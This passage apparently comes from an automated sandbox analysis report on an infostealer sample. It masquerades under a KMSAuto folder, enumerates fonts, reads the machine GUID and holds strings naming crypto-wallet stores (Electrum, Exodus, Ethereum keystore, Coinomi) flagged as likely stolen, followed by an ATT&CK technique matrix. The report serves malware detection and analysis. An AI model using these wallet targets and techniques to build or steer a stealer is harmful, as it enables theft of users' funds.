            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Electrum
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q.C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Jaxx
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\Users\user\AppData\Roaming\Ethereum\keystore
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Exodus
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q2C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Ethereum
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000332B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q0C:\Users\user\AppData\Roaming\Ethereum\keystore

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting            		Valid Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		211
            Process Injection            		1
            Masquerading            		OS Credential Dumping21
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory41
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Data from Local System            		11
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		41
            Virtualization/Sandbox Evasion            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading            		1
            DLL Side-Loading            		211
            Process Injection            		NTDS13
            System Information Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Obfuscated Files or Information            		LSA SecretsInternet Connection DiscoverySSHKeylogging3
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
            Software Packing            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Timestomp            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
